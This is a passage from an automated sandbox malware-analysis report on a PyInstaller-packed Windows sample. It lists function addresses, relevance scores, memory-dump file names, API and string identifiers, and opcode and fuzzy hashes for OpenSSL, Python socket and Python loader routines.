                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                              • Instruction ID: 0de5e91adda5b643549efd4550c29c5ef072a380bc9a6c5675796fb433ce32cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A318236608F8185EB20DF24E8403AEB3A4FB94758F900136EA9D43B69DF3CD145CB11
                                                                                                                                                                                                                              Function 00007FF8E7A21CBC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 292COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                                                              • API String ID: 0-1194634662
                                                                                                                                                                                                                              • Opcode ID: c94791f86e3c1c1323ec9f109cc887bfa88f100ec66f8452c83b76583b23fb71
                                                                                                                                                                                                                              • Instruction ID: 4b800031aa28aee72afbba43f41a439ea7137ee62c2e11955d0da1d16025092e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c94791f86e3c1c1323ec9f109cc887bfa88f100ec66f8452c83b76583b23fb71
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5D1AF22B1D68281FB509BA5E8427FD6790EB85BC8F544036EE6C4B79ACF3DE541C312
                                                                                                                                                                                                                              Function 00007FF8E8133E40 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 181networkCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007ErrorF906013440Last
                                                                                                                                                                                                                              • String ID: NOO$surrogatepass$unsupported address family
                                                                                                                                                                                                                              • API String ID: 3485956551-472101058
                                                                                                                                                                                                                              • Opcode ID: e2301973ca244d9adc6b6ab578d2e372c8de1439fb0a9aba9528582346aaa0b5
                                                                                                                                                                                                                              • Instruction ID: 643dddd20b66920805b14124c9f20cc2ccbdd0a344b5e7baad2f5bdd81823957
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2301973ca244d9adc6b6ab578d2e372c8de1439fb0a9aba9528582346aaa0b5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD81BD22E08B9281EA518BA5E5403BE73A0FF59BD0F064135DE4E437A4EF3DE484C70A
                                                                                                                                                                                                                              Function 00007FF7EAD21874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                              • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                              • Instruction ID: aa46445dc62515560b75628329d928c87d25a4fdc03928228d9be78db9822ea6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59B1B432B1869241FA61EB2195043B9E3A1EB95BE4F849173EA5D07B9DEE3CE441C331
                                                                                                                                                                                                                              Function 00007FF8E7A21EE2 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 470COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F9060208
                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                                                                              • API String ID: 3464486852-3130753023
                                                                                                                                                                                                                              • Opcode ID: 61b467f36872fde71698c80f3b57ac3c6faba2ba744cb4768d1c2235e01b7059
                                                                                                                                                                                                                              • Instruction ID: d7b94f398e579b8384c67afcaba4ccece4eca849c8f0c4c98233d2934fff13c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61b467f36872fde71698c80f3b57ac3c6faba2ba744cb4768d1c2235e01b7059
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A12D262B0CA8281FB149BA5E4467BEA795FF817C4F404032EE6D47B9ADF7CE5418702
                                                                                                                                                                                                                              Function 00007FF8E80FBF74 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                              • String ID: Cannot create a client socket with a PROTOCOL_TLS_SERVER context$Cannot create a server socket with a PROTOCOL_TLS_CLIENT context$Python
                                                                                                                                                                                                                              • API String ID: 3568877910-1888807747
                                                                                                                                                                                                                              • Opcode ID: cd1b8ea646ef9afa8d9b55c550e8d37b12c63986d5a7a861df86a7bcf2bbbd8b
                                                                                                                                                                                                                              • Instruction ID: dce0bd8f1933e4e2116dd78d44b20ef01ffc490bc8d8d763985a4fea84b3de59
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd1b8ea646ef9afa8d9b55c550e8d37b12c63986d5a7a861df86a7bcf2bbbd8b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37A14A36A0CA5286EEA09FA6A85562D7361FF85BD0F148435DE4E07BE0DF3CE445870A
                                                                                                                                                                                                                              Function 00007FF7EAD25E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25EAA
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD2560C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25EBB
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD25598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD255AC
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25ECC
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD255C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD255DC
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: HeapFree.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7EAD2610C), ref: 00007FF7EAD25EF3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3458911817-0
                                                                                                                                                                                                                              • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                              • Instruction ID: bf490f140bd8aad831dba4d5576fa1d25809c9971226ccdb52ff4440ccbece9c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72517F32A0864286F710FF25D9816A9E761FB88784FC041B7EA4D876A9EF3CE441C771
                                                                                                                                                                                                                              Function 00007FF8E7A224DC Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F9060208
                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
                                                                                                                                                                                                                              • API String ID: 3464486852-446233508
                                                                                                                                                                                                                              • Opcode ID: 6f1e473bb4d7c6af8c0df0e29d063f6f90a189f454450d160f75b595daedfc77
                                                                                                                                                                                                                              • Instruction ID: 9980b957c3c5f89ef1394b8c1d43689299db9f8214a8792378a7be1de799e1df
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f1e473bb4d7c6af8c0df0e29d063f6f90a189f454450d160f75b595daedfc77
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1ED10061B0D6C381FB54EBA2E5527BE2291EF85BC4F550031EE2D4BB86CF2DE5518B02
                                                                                                                                                                                                                              Function 00007FF8E8136424 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: listen
                                                                                                                                                                                                                              • String ID: |i:listen
                                                                                                                                                                                                                              • API String ID: 3257165821-1087349693
                                                                                                                                                                                                                              • Opcode ID: 236a73d6f59518f4dd2701652e7b01f649b09d785da2048cfb4d59739cfef329
                                                                                                                                                                                                                              • Instruction ID: 907397184f89c31e2aa6326d59105fac0b967d248228e3fb1d326fc39c0afe98
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 236a73d6f59518f4dd2701652e7b01f649b09d785da2048cfb4d59739cfef329
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9014C21B28A4283FB448FA2E98426E6371FF89BD0F154031DA4E43B58DF3CE455C705
                                                                                                                                                                                                                              Function 00007FF8E7A68816 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e01617633d62c7c04581d9db99b67ae7cf5d116ed409b32e1f2b517a31030fcb
                                                                                                                                                                                                                              • Instruction ID: 7401c2ccebd71d26920eff96f626991c1986ea97818037b19c6067321994f069
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e01617633d62c7c04581d9db99b67ae7cf5d116ed409b32e1f2b517a31030fcb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8B0924324E2C10BC302C7B4482444D2FA08583A4076C408F838683283C00C48488302
                                                                                                                                                                                                                              Function 00007FF7EAD05830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05840
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05852
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05889
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0589B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058B4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058C6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058DF
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058F1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0590D
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0591F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0593B
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0594D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05969
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0597B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05997
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD059A9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD059C5
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD059D7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                              • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                              • Instruction ID: 838a6403920f793cf825e78015ef6722e1d388e4f4ef0c52e758ecde8d02b0c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE22D274A09B0781FA05FB11A8507B4A7A5EF05749FD490F7E81E02268FFBCB948C272
                                                                                                                                                                                                                              Function 00007FF7EAD076C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
